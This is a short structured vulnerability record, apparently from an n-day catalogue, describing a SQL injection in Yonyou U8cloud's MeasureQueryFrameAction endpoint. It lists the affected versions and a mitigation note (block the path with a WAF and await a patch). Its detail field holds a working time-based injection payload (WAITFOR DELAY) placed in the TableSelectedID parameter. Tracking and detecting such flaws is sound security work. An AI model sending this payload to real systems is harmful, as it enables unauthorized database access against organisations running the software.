vendor = "用友"
name = "用友U8cloud-MeasureQueryFrameAction存在SQL注入漏洞"
type = "SQL注入"
version = "1.0,2.0,2.1,2.3,2.5,2.6,2.65,2.7,3.0,3.1,3.2,3.5,3.6,3.6sp,5.0,5.0sp"
path = "/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryFrameAction&method=doRefresh&TableSelectedID="
detail = "/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryFrameAction&method=doRefresh&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:3%27--+"
fix = "WAF封禁路路径，等待发布补丁"
date = "0726"
label = "nday"
